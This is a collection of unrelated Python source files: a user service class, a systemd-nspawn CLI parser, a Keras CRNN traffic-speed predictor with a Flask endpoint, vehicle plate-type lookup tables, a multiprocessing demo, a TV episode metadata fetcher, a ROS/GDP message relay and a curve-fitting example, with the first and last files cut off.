        return [UserDBSchema.from_orm(user) for user in users]

    async def get_user_by_id(self, user_id: int) -> Optional[UserDBSchema]:
        """Return the user with `user_id`, or None when it does not exist."""
        user = await self.__user_queries.get_user_byid(user_id)
        if user:
            return UserDBSchema.from_orm(user)
        return None

    async def update_user(self, user_id: int, new_user: UserUpdateSchema) -> UserDBSchema:
        """Apply `new_user` on top of the stored user and return the result."""
        old_user = await self.__user_queries.get_user_byid(user_id)
        user_updated = await self.__user_queries.update_user(old_user, new_user)
        return UserDBSchema.from_orm(user_updated)

    async def remove_user(self, user_id: int) -> UserDBSchema:
        """Delete the user with `user_id` and return its last stored state."""
        user_removed = await self.__user_queries.delete_user(user_id)
        return UserDBSchema.from_orm(user_removed)
|
"""
Main program parser
"""
import textwrap
from argparse import ArgumentParser, RawTextHelpFormatter
from enum import Enum, unique
from nspawn.support.typing import enum_name_list
from nspawn import with_merge_parser
def attach_engine(parser:ArgumentParser):
    """Register the arguments shared by every engine invocation."""
    group = parser.add_argument_group('required arguments')
    group.add_argument(
        "--script",
        required=True,
        help="Provide script path",
    )
def attach_build(parser:ArgumentParser):
    # Placeholder: the build front-end currently needs no arguments beyond
    # the shared engine ones (see attach_engine).
    pass
@unique
class SetupAction(Enum):
    """Machine setup actions selectable via --action; see attach_setup for semantics."""
    update = 'update'
    ensure = 'ensure'
    desure = 'desure'
    create = 'create'
    delete = 'delete'
    enable = 'enable'
    disable = 'disable'
    start = 'start'
    stop = 'stop'
    command = 'command'
    nsenter = 'nsenter'
def attach_setup(parser:ArgumentParser):
    """Register the --action argument selecting the machine setup step."""
    # required = parser.add_argument_group('required setup arguments')
    default = SetupAction.update.name
    parser.add_argument(
        "--action",
        help=textwrap.dedent(
            f"""\
            Select setup action (default={default}):
            update : perform 'desure' then 'ensure'
            desure : perform sequence: 'stop', 'disable', 'delete'
            ensure : perform sequence: 'create', 'enable', 'start'
            create : create 'machine.service' file into /etc/systemd/system, perform 'command'
            delete : delete 'machine.service' file from /etc/systemd/system
            enable : enable 'machine.service'
            disable: disable 'machine.service'
            start : start 'machine.service'
            stop : stop 'machine.service'
            command: execute run/sh commands from setup.py
            nsenter: enter 'machine.service' namespace
            """),
        choices=enum_name_list(SetupAction),
        default=default,
        # required=True,
    )
def engine_parser(prog:str) -> ArgumentParser:
    """Build the base ArgumentParser shared by the build/setup front-ends."""
    description = textwrap.dedent(
        """\
        Containers with systemd-nspawn :: dsl script engine.
        """)
    return ArgumentParser(
        prog=prog,
        description=description,
        formatter_class=RawTextHelpFormatter,
    )
def build_parser():
    """Parser for the nspawn-build entry point (engine + build arguments)."""
    parser = engine_parser('nspawn-build')
    with_merge_parser(parser)
    attach_engine(parser)
    attach_build(parser)
    return parser
def setup_parser():
    """Parser for the nspawn-setup entry point (engine + setup arguments)."""
    parser = engine_parser('nspawn-setup')
    with_merge_parser(parser)
    attach_engine(parser)
    attach_setup(parser)
    return parser
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
_/ _/ _/_/_/ _/ _/ _/_/_/
_/_/ _/ _/ _/ _/ _/
_/ _/ _/ _/ _/_/_/_/ _/
_/ _/_/ _/ _/ _/ _/
_/ _/ _/_/_/ _/ _/ _/_/_/
https://github.com/TW-NCHC/functionality-scenario-test-A-2018
This program can train a CRNN (convolutional recurrent neural network)
and provide web service for predicting
@author August Chao <AugustChao@narlabs.org.tw>
"""
from __future__ import print_function
import warnings
warnings.simplefilter(action="ignore",category=DeprecationWarning)
warnings.simplefilter(action="ignore",category=FutureWarning)
import logging
import dill as pickle
#from optparse import OptionParserf
from optparse import OptionParser
import time
import datetime
import os
import re
import subprocess
import numpy as np
import pandas as pd
import keras.backend as K
from tqdm import tqdm
from joblib import Parallel, delayed
from keras.models import Model
from keras.layers.recurrent import SimpleRNN, LSTM, GRU
#from keras.utils.training_utils import multi_gpu_model
from keras.utils import multi_gpu_model
from keras.optimizers import RMSprop
from keras.layers import MaxPooling2D, Conv2D, RepeatVector, LSTM, multiply, Permute
from keras.optimizers import Adam
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.layers import Input
from keras.layers.wrappers import TimeDistributed
from keras.callbacks import EarlyStopping, ModelCheckpoint, CSVLogger
from keras.utils import np_utils
from keras.models import model_from_json
from keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img
from sklearn.preprocessing import LabelBinarizer
from keras.layers.recurrent import LSTM
from keras.utils import to_categorical
from keras.layers import Bidirectional
import random
os.environ["JOBLIB_TEMP_FOLDER"]="./tmp" # see issue https://goo.gl/4YZJUH
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]="0"
# Flask app used by the serving mode (see getCurrentSpeed / main).
from flask import Flask
app = Flask("NCHC_Visual_Speed")
def create_model(input_shape=(30, 120, 176, 1), rnn_units=128, cnn_units=32, num_gpu=1, nb_category=10):
    """
    Build and compile the CRNN: a TimeDistributed CNN feature extractor
    followed by stacked GRUs and a softmax classifier.

    input_shape: (frames, height, width, channels) of one input clip
    rnn_units / cnn_units: widths of the GRU and Conv2D layers
    num_gpu: wrap with multi_gpu_model when > 1
    nb_category: number of output classes
    """
    # define our time-distributed setup
    inp = Input(shape=input_shape)
    x = TimeDistributed(Conv2D(cnn_units, (3, 3), padding='same', activation='relu'))(inp)
    x = TimeDistributed(Conv2D(cnn_units, (3, 3), padding='same', activation='relu'))(x)
    x = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(x)
    x = Dropout(.5)(x)
    x = TimeDistributed(Conv2D(cnn_units, (3, 3), padding='same', activation='relu'))(x)
    x = TimeDistributed(Conv2D(cnn_units, (3, 3), padding='same', activation='relu'))(x)
    x = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(x)
    x = Dropout(.5)(x)
    x = TimeDistributed(Flatten())(x)
    x = GRU(units=rnn_units, return_sequences=True)(x)
    x = Dropout(.5)(x)
    x = TimeDistributed(Flatten())(x)
    x = GRU(units=rnn_units, return_sequences=True)(x)
    x = Dropout(.5)(x)
    x = GRU(units=rnn_units, return_sequences=False)(x)
    x = Dropout(.5)(x)
    # BUG FIX: the class count was hard-coded to 4 and silently ignored
    # nb_category; use the parameter (callers pass train_y.shape[1]).
    x = Dense(nb_category, activation='softmax')(x)
    opt_adm = Adam()
    model = Model(inp, x)
    if num_gpu > 1:
        model = multi_gpu_model(model, gpus=num_gpu) # gpus
    model.compile(optimizer=opt_adm, loss='categorical_crossentropy', metrics=['accuracy'])
    model.summary()
    print ("model params: %s"%model.count_params())
    return model
def get_worker(mdir, fn):
    """
    Load one pickled dataset file from directory `mdir`.

    BUG FIX: pickled data must be opened in binary mode ('rb'); text mode
    ('r') fails on Python 3 and is unreliable for binary payloads.
    """
    with open("%s/%s"%(mdir, fn), 'rb') as handle:
        return pickle.load(handle)
#def rand_getDataSet(dataset_path = "./datasets", size=100):
def rand_getDataSet(dataset_path = "./datasets", epochs=20, batchsize=8, ds_count=100):
    """
    Generator yielding (train_x, train_y) batches for fit_generator.

    Each iteration loads 7 randomly-chosen pickled files from dataset_path
    and one-hot encodes the speed labels against the fixed class set
    {60, 80, 90, 100}. Yields epochs * (ds_count // batchsize) batches.
    """
    random.seed(9001)
    r_file_no = int(random.randint(0,300))  # NOTE(review): unused -- confirm before removing
    count = 0
    while count < epochs * int(ds_count/batchsize):
        count += 1
        fns = os.listdir(dataset_path)
        np.random.shuffle(fns)
        fns = fns[0:7]
        all_datasets = Parallel(n_jobs=-1)(
            delayed(get_worker)(dataset_path, fns[i]) for i in tqdm( range(len(fns)),
                                ascii=True,
                                desc="Loading DS", ) )
        #all_data = getDataSet(dataset_path, data_size)
        train_x = np.array([x for (x, y) in all_datasets])
        pre_train_y = np.array([y for (x, y) in all_datasets])
        # Prepend the four known speed classes so the binarizer always sees
        # every label, then drop those synthetic rows after encoding.
        a = np.array([60,80,90,100])
        pre_train_y = np.concatenate((a, pre_train_y))
        encoder = LabelBinarizer()
        train_y = encoder.fit_transform(["%s" % (x) for x in pre_train_y])
        train_y = np.delete(train_y, np.s_[0:4], axis=0)
        yield (train_x, train_y)
def getDataSet(dataset_path = "./datasets", size=100):
    """
    Load up to `size` randomly-chosen pickled dataset files from dataset_path.

    size <= 0 loads every file. Returns a list of (x, y) samples.
    """
    fns = os.listdir(dataset_path)
    np.random.shuffle(fns)
    if int(size) > 0 :
        fns = fns[:int(size)]
    # Deserialise the selected files in parallel across all cores.
    datasets = Parallel(n_jobs=-1)(
        delayed(get_worker)(dataset_path, fns[i]) for i in tqdm( range(len(fns)),
                            ascii=True,
                            desc="Loading DS", ) )
    return datasets
def train( dataset_path = "./datasets",
           data_size = 100,
           nb_epochs=2,
           weight_path="./weights"):
    """
    Train the CRNN with fit_generator; save checkpoints, model JSON and the
    label encoder under weight_path.

    NOTE(review): dataset_path is passed by main() but the data paths below
    are hard-coded and ignore it -- confirm intent.
    """
    #For Test data
    all_data = getDataSet("./datasets/nfbCCTV-N1-N-90.01-M", data_size)
    train_x = np.array([ x for (x,y) in all_data ])
    pre_train_y = np.array([ y for (x,y) in all_data ])
    print ("Test Speed(y) distributions: \n", "%s"%pd.Series(pre_train_y).value_counts())
    encoder = LabelBinarizer()
    train_y = encoder.fit_transform([ "%s"%(x) for x in pre_train_y])
    print(train_y.shape)
    #For valid_data
    all_data_val = getDataSet("./datasets_val/nfbCCTV-N1-N-90.01-M", data_size)
    train_x_val = np.array([ x for (x,y) in all_data_val ])
    pre_train_y_val = np.array([ y for (x,y) in all_data_val ])
    print ("Valid Speed(y) distributions: \n", "%s"%pd.Series(pre_train_y_val).value_counts())
    encoder = LabelBinarizer()
    train_y_val = encoder.fit_transform([ "%s"%(x) for x in pre_train_y_val])
    print(train_y_val.shape)
    np.random.seed(6813)
    K.set_image_dim_ordering('tf')
    batch_size = 8
    print("--"*5, "=="*5, "Dataset Info", "=="*5, "--"*5)
    print('X_train_raw shape:', train_x.shape)
    print(train_x.shape[0], 'train samples')
    print(len(train_y), 'test samples', train_y.shape)
    # creates weight_path
    if not os.path.isdir(weight_path):
        subprocess.call(["mkdir", "-p", weight_path])
    # Checkpoint on training accuracy; log every epoch to training.log.
    callbacks = [
        ModelCheckpoint(filepath="%s/weights.{epoch:02d}-{acc:.4f}.hdf5"%(weight_path), save_best_only=True, monitor='acc', verbose=0),
        CSVLogger(os.path.join(".", "training.log")),
    ]
    m_model = create_model(input_shape=train_x.shape[1:], nb_category=train_y.shape[1], rnn_units=128, cnn_units=32, num_gpu=1)
    #Updated for "fit_generator"
    m_model.fit_generator(rand_getDataSet("./datasets/nfbCCTV-N1-N-90.01-M", nb_epochs,batch_size, int(len(train_y[0:]))), steps_per_epoch=int(len(train_y[0:])) / batch_size,
                          epochs=nb_epochs,
                          validation_data=rand_getDataSet("./datasets_val/nfbCCTV-N1-N-90.01-M", nb_epochs, batch_size, int(len(train_y[0:]))),
                          validation_steps=int(len(train_y_val[0:])) / batch_size, callbacks=callbacks)
    # m_model.fit_generator(rand_getDataSet(dataset_path, 1), steps_per_epoch=320/8, epochs=nb_epochs)
    #m_model.fit(train_x, train_y, batch_size=batch_size, epochs=nb_epochs, validation_split=0.1, shuffle=True, verbose=1, callbacks=callbacks)
    #print("--"*5, "=="*5, "Model Results", "=="*5, "--"*5)
    #scores = m_model.evaluate(train_x_val, trin_y_val, verbose=1)
    #print("##Model %s: %.2f%%" % (m_model.metrics_names[1], scores[1]*100))
    model_json = m_model.to_json()
    model_fn = "%s/model.json"%(weight_path)
    with open( model_fn, "w") as json_file:
        json_file.write(model_json)
    print("Model Saved: %s"%(model_fn))
    # NOTE(review): pickled data should be written in binary mode ("wb");
    # text mode only works on Python 2 -- confirm the target interpreter.
    encoder_fn = "%s/encoder.pkl"%(weight_path)
    with open( encoder_fn, "w") as fp:
        pickle.dump(encoder, fp)
    print("Target Encoder Saved: %s"%(encoder_fn))
    print("Model Weights are: \n", ",\n ".join(sorted(os.listdir(weight_path))))
def getImgFrmFn(fn, mdir):
    """Load one CCTV frame as a (120, 176, 1) grayscale array normalised to [0, 1]."""
    return img_to_array(load_img("%s/%s"%(mdir, fn),
                        target_size=(120, 176),
                        grayscale=True,
                        interpolation="hamming" ))/255.
def getBestModel():
    """
    Load the saved model architecture plus the weight file with the best
    recorded accuracy from the global _weight_path_ directory.

    Returns the keras model, or None when the architecture cannot be loaded.
    """
    global _weight_path_
    global _img_path_
    try:
        # load json and create model; `with` guarantees the handle is closed
        # even when reading fails (the original leaked it on error).
        with open("%s/model.json"%(_weight_path_), 'r') as json_file:
            loaded_model_json = json_file.read()
        loaded_model = model_from_json(loaded_model_json)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit propagate.
        print("Error while loading model from directory: %s"%(_weight_path_))
        return None
    # load weights into new model.
    # Files are named weights.{epoch:02d}-{acc:.4f}.hdf5; pick the best acc.
    best_weight = .0
    best_weight_fn = ""
    for wfn in os.listdir(_weight_path_):
        if re.search("hdf5$", wfn):
            acc_val = float(wfn.split("-")[1].replace(".hdf5", ""))
            if acc_val > best_weight:
                best_weight = acc_val
                best_weight_fn = wfn
    print("Loading Best Acc-Model: %s"%(best_weight_fn))
    loaded_model.load_weights(_weight_path_ + "/" + best_weight_fn)
    return loaded_model
def predictor(weight_path="./weights", opath="./cctv_imgs", token = "nfbCCTV-N1-N-90.01-M"):
    """
    Predict the current speed from the 30 newest CCTV frames for `token`.

    Uses the module-global _model_ loaded by getBestModel(); returns a
    human-readable result string.
    """
    global _model_
    DIR = "%s/%s"%(opath, token)
    logging.info("Scanning image files in directory: %s"%(DIR))
    # Newest 30 frames; file names are unix timestamps with a .jpg suffix.
    all_images = sorted([ name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))], reverse=True)[:30]
    last_img_time = datetime.datetime.fromtimestamp(float(all_images[0].replace(".jpg", ""))).strftime('%Y-%m-%d %H:%M:%S')
    pre_set = Parallel(n_jobs=-1)(delayed(getImgFrmFn)(all_images[i], DIR) for i in tqdm( range(len(all_images)),
                                  ascii=True,
                                  desc="Loading IMGs", ) )
    pre_set = np.array([pre_set])
    print ("dataset for predicting: ",pre_set.shape)
    res = _model_.predict(pre_set)
    # NOTE(review): "r" text mode for unpickling only works on Python 2;
    # Python 3 requires "rb" -- confirm the target interpreter.
    encoder_fn = "%s/encoder.pkl"%(weight_path)
    with open( encoder_fn, "r") as fp:
        encoder = pickle.load(fp)
    return "Speed Predicting Result for (%s) is %s."%(last_img_time, encoder.inverse_transform(res)[0])
@app.route("/")
def getCurrentSpeed():
    """Flask endpoint: run the predictor on the newest CCTV frames and return its text result."""
    global _weight_path_
    global _img_path_
    start = time.time()
    res = predictor(weight_path=_weight_path_, opath=_img_path_)
    end = time.time()
    # Timing goes to stdout only; the HTTP response is just the result text.
    print( "Model building time: %.4f seconds."%(end - start) )
    return res
def main():
    """Parse CLI options, then either serve the best saved model over Flask or train."""
    parser = OptionParser()
    parser.add_option('-i', '--image_path', dest='img_path',
                      default="./cctv_imgs",
                      help='this path stores all cctv images, default="./cctv_imgs"')
    parser.add_option('-w', '--weight_path', dest='weight_path',
                      default="./weights",
                      help='destination path for weights, default="./weights"')
    parser.add_option('-d', '--datasets_path', dest='dataset_path',
                      default="./datasets",
                      help='destination path for pickled(dill) datasets, default="./datasets"')
    parser.add_option('-e', '--epochs_num', dest='epochs_num',
                      default=20,
                      help='epochs_num for training, default=20')
    parser.add_option('-l', '--lot_size', dest='lot_size',
                      default=0,
                      help='training data lot 0 for all, any number >0 will be limited to that size, default=0')
    parser.add_option('-p', '--serve_port', dest='serve_port',
                      default=80,
                      help='python flask bind port for requesting model results, default=80')
    parser.add_option('-a', '--address_ip', dest='address_ip',
                      default='172.17.0.2',
                      help='python flask bind ip address, default="172.17.0.2"')
    parser.add_option('-t', '--cctv_token', dest='token',
                      default="nfbCCTV-N1-N-90.01-M",
                      help='token for cctvid in tisv xml, default="nfbCCTV-N1-N-90.01-M"')
    parser.add_option('-s', '--is_serve', dest='isServe',
                      default=False, action="store_true",
                      help='picking best model weight to predict by latest 30 images. \n-i can define img_path for detecting new images, default=False')
    (options, args) = parser.parse_args()
    logging.basicConfig(level=logging.INFO)
    if options.isServe:
        # Serving mode: load the best checkpoint and expose it over HTTP.
        print ("-"*5, "="*5, "SERVING MODEL", "="*5, "-"*5)
        global _weight_path_
        global _img_path_
        global _model_
        _weight_path_= options.weight_path
        _img_path_ = options.img_path
        _model_ = getBestModel()
        app.run(host=options.address_ip, port=options.serve_port)
    else:
        # Training mode: train on the pickled datasets for the given token.
        print ("-"*5, "="*5, "TRAINING MODEL", "="*5, "-"*5)
        start = time.time()
        train( options.dataset_path + "/" + options.token,
               data_size = options.lot_size,
               nb_epochs=int(options.epochs_num),
               weight_path=options.weight_path )
        end = time.time()
        print( "Model building time: %.4f seconds."%(end - start) )

if __name__ == "__main__":
    main()
|
# XPath selectors for each vehicle plate-type option in the #vhpzl <select>
# dropdown; keys are the site's Chinese option labels.
hpzl ={
        '大型汽车':'//*[@id="vhpzl"]/option[1]',
        '小型汽车':'//*[@id="vhpzl"]/option[2]',
        '大型新能源汽车':'//*[@id="vhpzl"]/option[3]',
        '小型新能源汽车':'//*[@id="vhpzl"]/option[4]',
        '使馆汽车':'//*[@id="vhpzl"]/option[5]',
        '领馆汽车':'//*[@id="vhpzl"]/option[6]',
        '境外汽车':'//*[@id="vhpzl"]/option[7]',
        '外籍汽车':'//*[@id="vhpzl"]/option[8]',
        '普通摩托车':'//*[@id="vhpzl"]/option[9]',
        '轻便摩托车':'//*[@id="vhpzl"]/option[10]',
        '使馆摩托车':'//*[@id="vhpzl"]/option[11]',
        '领馆摩托车':'//*[@id="vhpzl"]/option[12]',
        '境外摩托车':'//*[@id="vhpzl"]/option[13]',
        '外籍摩托车':'//*[@id="vhpzl"]/option[14]',
        '低速车':'//*[@id="vhpzl"]/option[15]',
        '拖拉机':'//*[@id="vhpzl"]/option[16]',
        '挂车':'//*[@id="vhpzl"]/option[17]',
        '教练汽车':'//*[@id="vhpzl"]/option[18]',
        '教练摩托车':'//*[@id="vhpzl"]/option[19]',
        '试验汽车':'//*[@id="vhpzl"]/option[20]',
        '试验摩托车':'//*[@id="vhpzl"]/option[21]',
        '临时入境汽车':'//*[@id="vhpzl"]/option[22]',
        '临时入境摩托车':'//*[@id="vhpzl"]/option[23]',
        '临时行驶车':'//*[@id="vhpzl"]/option[24]',
        '警用汽车':'//*[@id="vhpzl"]/option[25]',
        '警用摩托':'//*[@id="vhpzl"]/option[26]',
        '原农机号牌':'//*[@id="vhpzl"]/option[27]',
        '香港入出境车':'//*[@id="vhpzl"]/option[28]',
        '澳门入出境车':'//*[@id="vhpzl"]/option[29]',
    }
# Mapping from province plate-prefix character to the two-letter region
# abbreviation used by the site.
city = {
    '京':'bj',
    '津':'tj',
    '冀':'he',
    '晋':'sx',
    '蒙':'nm',
    '辽':'ln',
    '吉':'jl',
    '黑':'hl',
    '沪':'sh',
    '皖':'ah',
    '闽':'fj',
    '赣':'jx',
    '鲁':'sd',
    '豫':'ha',
    '鄂':'hb',
    '湘':'hn',
    '粤':'gd',
    '桂':'gx',
    '琼':'hi',
    '渝':'cq',
    '川':'sc',
    '贵':'gz',
    '云':'yn',
    '陕':'sn',
    '甘':'gs',
    '青':'qh',
    '宁':'nx',
    '新':'xj'
}
#!/usr/bin/python
import multiprocessing
msjs = ["Hola", "Que tal?", "Chau"]
def enviar(conn, msjs):
    """Send every message through the pipe connection, then close it."""
    for mensaje in msjs:
        conn.send(mensaje)
    conn.close()
def recibir(conn):
    """Print messages received from the pipe until the "Chau" sentinel arrives."""
    while True:
        mensaje = conn.recv()
        if mensaje == "Chau":
            break
        print(mensaje)
if __name__ == "__main__":
    # BUG FIX: process creation must be guarded on spawn-based platforms
    # (Windows / macOS spawn): child interpreters re-import this module and
    # would otherwise recursively spawn processes.
    padre_conn, hijo_conn = multiprocessing.Pipe()
    p1 = multiprocessing.Process(target=enviar, args=(padre_conn, msjs))
    p2 = multiprocessing.Process(target=recibir, args=(hijo_conn,))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
|
from lib import *
from app import *
import pprint
class tvEpisode:
    """
    Metadata holder for one TV episode.

    Looks the episode up on TheTVDB first and falls back to TVRage on any
    unexpected failure. All fields default to None; the get* accessors
    return "" (or "Unknown" for the title) when a field was never set.
    NOTE(review): Python 2 code -- the str(...).encode('utf-8') calls rely
    on Python 2 byte-string semantics.
    """
    def __init__(self, serieData):
        # serieData: dict with at least 'series'; optionally 'season' and
        # 'episodeNumber' (lookups only run when both are present).
        self.seriesTitle = None
        self.seriesSeason = None
        self.seriesEpisode = None
        self.seriesEpisodeName = None
        self.seriesDescription = None
        self.seriesRating = None
        self.seriesAirDate = None
        self.seriesNetwork = None
        self.seriesGenre = None
        self.seriesImage = None
        self.seriesCast = None
        self.seriesImdbId = None
        self.seriesGrouping = None
        self.foundSeries = False
        self._setTitle(serieData['series'])
        if "season" in serieData and "episodeNumber" in serieData:
            self._setSeason(serieData['season'])
            self._setEpisode(serieData['episodeNumber'])
        self._parseData()
    def _parseData(self):
        # Populate fields from TheTVDB; on unexpected errors fall back to
        # TVRage. Returns False when no season was supplied.
        if self.seriesSeason is None:
            return False
        try:
            tvdb = tvdb_api.Tvdb(banners=True)
            title = self.getTitle()
            series = tvdb[title]
            season = int(self.getSeason())
            episode = int(self.getEpisode())
            self._setArtwork(series['_banners']['season']['season'], season, tvdb)
            self._setTitle(series['seriesname'])
            self._setEpisodeName(series[season][episode]['episodename'])
            self._setEpisodeDescription(series[season][episode]['overview'])
            self._setAirDate(series[season][episode]['firstaired'])
            self._setNetwork(series['network'])
            self._setGenre(series['genre'])
            self._setRating(series['contentrating'])
            self._setCast(series['actors'])
            self._setImdbId(series['imdb_id'])
            self.foundSeries = True
        except UnicodeEncodeError:
            # Drop into the debugger for encoding problems (development aid).
            import sys, pdb
            pdb.post_mortem(sys.exc_info()[2])
        except:
            import sys
            print "TheTVDB failed by unexpected error:", sys.exc_info()[0]
            print "Try TVRage instead"
            return self._useTVRage()
    def _useTVRage(self):
        # Fallback lookup via the TVRage API; fills a subset of the fields.
        title = self.getTitle()
        season = int(self.getSeason())
        episode = int(self.getEpisode())
        tvr = tvrage.api.Show(title)
        seasonData = tvr.season(season).episode(episode)
        self._setTitle(tvr.name)
        self._setEpisodeName(seasonData.title)
        self._setAirDate(seasonData.airdate)
        self._setGenre("'" + ",".join(tvr.genres) + "'")
        self._setGrouping('TVRage')
        self.foundSeries = True
        """"
        self._setArtwork(series['_banners']['season']['season'], season, tvdb)
        """
        return True
    def _setTitle(self, title):
        if title is not None:
            title = self._optimizeTitleForSearch(title)
            self.seriesTitle = str(title).encode('utf-8').strip()
    def _setSeason(self, season):
        if season is not None:
            self.seriesSeason = str(season).encode('utf-8').strip()
    def _setEpisode(self, episode):
        if episode is not None:
            self.seriesEpisode = str(episode).encode('utf-8').strip()
    def _setEpisodeName(self, episodeName):
        if episodeName is not None:
            self.seriesEpisodeName = str(episodeName).encode('utf-8').strip()
    def _setEpisodeDescription(self, episodeDescription):
        if episodeDescription is not None:
            self.seriesDescription = episodeDescription.strip()
    def _setAirDate(self, airdate):
        if airdate is not None:
            self.seriesAirDate = str(airdate).encode('utf-8').strip()
    def _setNetwork(self, network):
        if network is not None:
            self.seriesNetwork = str(network).encode('utf-8').strip()
    def _setGenre(self, genre):
        # Drops the leading character and keeps the first '|'-separated entry.
        if genre is not None:
            genre = (genre)[1:len(genre)]
            self.seriesGenre = genre[0:genre.find("|")].encode('utf-8').strip()
    def _setRating(self, rating):
        if rating is not None:
            self.seriesRating = rating.encode('utf-8').strip()
    def _setCast(self, cast):
        # Converts the '|'-separated actor string into a comma-separated one.
        if cast is not None:
            self.seriesCast = ",".join(cast.split('|'))
    def _setImdbId(self, imdbId):
        if imdbId is not None:
            self.seriesImdbId = imdbId.strip()
    def _setArtwork(self, banners, season, tvdb):
        # Pick the first English banner matching this season.
        for s in banners:
            artwork = tvdb[self.getTitle()]['_banners']['season']['season'][s]
            if artwork['language'] == "en" and int(artwork['season']) == season:
                self.seriesImage = artwork['_bannerpath']
                break
    def _setGrouping(self, text):
        if text is not None:
            self.seriesGrouping = text.strip()
    def getTitle(self):
        if self.seriesTitle is not None:
            return self.seriesTitle
        else:
            return "Unknown"
    def getTitleClean(self):
        # Strips/truncates a few known problem titles for display purposes.
        _title = self.getTitle()
        if _title.find('Revolution.') != -1:
            title = _title[:-5]
        elif _title.find('Archer') != -1:
            title = _title[0:6]
        elif _title.find('Touch') != -1:
            title = _title[0:5]
        else:
            title = _title
        return title
    def getSeason(self):
        if self.seriesSeason is not None:
            return self.seriesSeason
        else:
            return ""
    def getEpisode(self):
        if self.seriesEpisode is not None:
            return self.seriesEpisode
        else:
            return ""
    def getEpisodeName(self):
        if self.seriesEpisodeName is not None:
            return self.seriesEpisodeName
        else:
            return ""
    def getDescription(self):
        if self.seriesDescription is not None:
            return self.seriesDescription
        else:
            return ""
    def getRating(self):
        if self.seriesRating is not None:
            return self.seriesRating
        else:
            return ""
    def getGenre(self):
        if self.seriesGenre is not None:
            return self.seriesGenre
        else:
            return ""
    def getImage(self):
        if self.seriesImage is not None:
            return self.seriesImage
        else:
            return ""
    def getNetwork(self):
        if self.seriesNetwork is not None:
            return self.seriesNetwork
        else:
            return ""
    def getAirdate(self):
        if self.seriesAirDate is not None:
            return self.seriesAirDate
        else:
            return ""
    def getCast(self):
        if self.seriesCast is not None:
            return self.seriesCast
        else:
            return ""
    def getImdbId(self):
        if self.seriesImdbId is not None:
            return self.seriesImdbId
        else:
            return ""
    def getGrouping(self):
        if self.seriesGrouping is not None:
            return self.seriesGrouping
        else:
            return ""
    def _optimizeTitleForSearch(self, title):
        # Disambiguate titles that collide on TheTVDB by appending the year.
        _title = title
        if _title.find('Archer') != -1:
            title = title + " (2009)"
        if _title.find('Touch') != -1:
            title = title + " (2012)"
        else:
            title = _title
        return title
|
#!/usr/bin/env python
import rospy
import roslib
import rostopic
import gdp
import pickle
import zlib
import sys
import argparse
from threading import Lock
from std_msgs.msg import String, Float64
from rospy.msg import AnyMsg
def _parse_args():
    """returns arguments passed to this node

    --preserve keeps original topic names; `logname` names the GDP log.
    """
    # setup argument parsing. These could be either passed on
    # command line (when invoking directly), or via a .launch file
    # when using roslaunch
    parser = argparse.ArgumentParser()
    parser.add_argument("--preserve", action="store_true", help="Preserve "
                        "the topic names as is. Default False")
    parser.add_argument("logname", type=str, help="GDP log")
    # cleaned up arguments (rospy.myargv strips ROS remapping args)
    _args = rospy.myargv(argv=sys.argv)[1:]
    return parser.parse_args(args=_args)
def gdp_source():
    """
    Relay messages from a GDP log back onto ROS topics.

    Subscribes to the GDP log named on the command line, reassembles chunked
    messages by byte offset, and republishes each completed message on its
    (optionally '/gdp'-prefixed) original topic.
    """
    rospy.init_node("gdp_source")
    gdp.gdp_init()
    lock = Lock()
    args = _parse_args()
    topic_dict = {}  # topic name -> cached rospy.Publisher
    gcl_name = gdp.GDP_NAME(args.logname)
    loghandle = gdp.GDP_GCL(gcl_name, gdp.GDP_MODE_RO)
    loghandle.subscribe(0, 0, None)
    try:
        buf = ""
        while not rospy.is_shutdown():
            event = loghandle.get_next_event(None)
            data = event["datum"]["data"]
            d = pickle.loads(data)
            if args.preserve:
                topic = d["topic"]
            else:
                topic = "/gdp" + rospy.names.resolve_name(d["topic"])
            topic_type = d["topic_type"]
            try:
                # Chunks must arrive in order; offset tracks reassembly state.
                assert len(buf) == d["offset"]
            except AssertionError:
                ## This is when we start at the wrong time, and some
                ## chunks of a message already have been missed.
                continue
            buf = buf + d["data"]
            if len(buf) == d["msg_size"]:
                with lock: ## get publisher, create if doesn't exist
                    pub = topic_dict.get(topic, None)
                    if pub is None:
                        msg_class = roslib.message.get_message_class(topic_type)
                        pub = rospy.Publisher(topic, msg_class, queue_size=10)
                        topic_dict[topic] = pub
                print "Publishing message"
                pub.publish(pickle.loads(zlib.decompress(buf)))
                buf = ""
    except rospy.ROSInterruptException:
        pass
    del loghandle
# Run the relay node only when invoked directly (not on import).
if __name__=="__main__":
    gdp_source()
|
import numpy as np
from crepe import normal
import matplotlib.pyplot as plt
# CREPE optimizer instance used for the parameter estimation below
n = normal.optimize()
# Importing data: two columns, x in column 0 and y in column 1
data = np.loadtxt('data.dat',float,usecols=(0,1))
N = len(data[:,0])  # number of observations
# Function to be simulated
def f(x, a, b):
    """Exponential model a * exp(b * x) evaluated at x."""
    growth = np.exp(b * x)
    return a * growth
# The performance function: just a simple sum of the squared differences!
def perf(p):
    """Sum of squared residuals between the data and the model f for parameters p = (a, b)."""
    residuals = data[:, 1] - f(data[:, 0], p[0], p[1])
    return np.sum(residuals ** 2)
# Let's guess a and b (an interval that you think they could be inside)
p_min = np.array([5.0,2.0]) # Parameters minima
p_max = np.array([10.0,10.0]) # Parameters maxima
p_mean = (p_min + p_max)/2. # Parameters means
p_sigma = (p_max - p_min)/2. # Parameters standard deviations
# The estimation by CREPE is done in just one line:
new_p_mean,new_p_sigma = n.estimate(perf,p_mean,p_sigma)
# Printing the results ("p/m" = plus/minus one standard deviation)
print('a = %.3f p/m %.3f' % (new_p_mean[0],new_p_sigma[0]))
print('b = %.3f p/m %.3f' % (new_p_mean[1],new_p_sigma[1]))
# Evaluate the fitted model at the observed x values and plot both curves
estim_y = np.array([f(xk,new_p_mean[0],new_p_mean[1]) for xk in data[:,0]])
plt.plot(data[:,0],data[:,1],'.',label='Noisy signal')
plt.plot(data[:,0],estim_y,'g',label='Fitted signal')
plt.legend()
#plt.show()
|
#!/usr/bin/env python
import sys, os, re, glob
try:
import io
except ImportError:
import cStringIO as io
def usage():
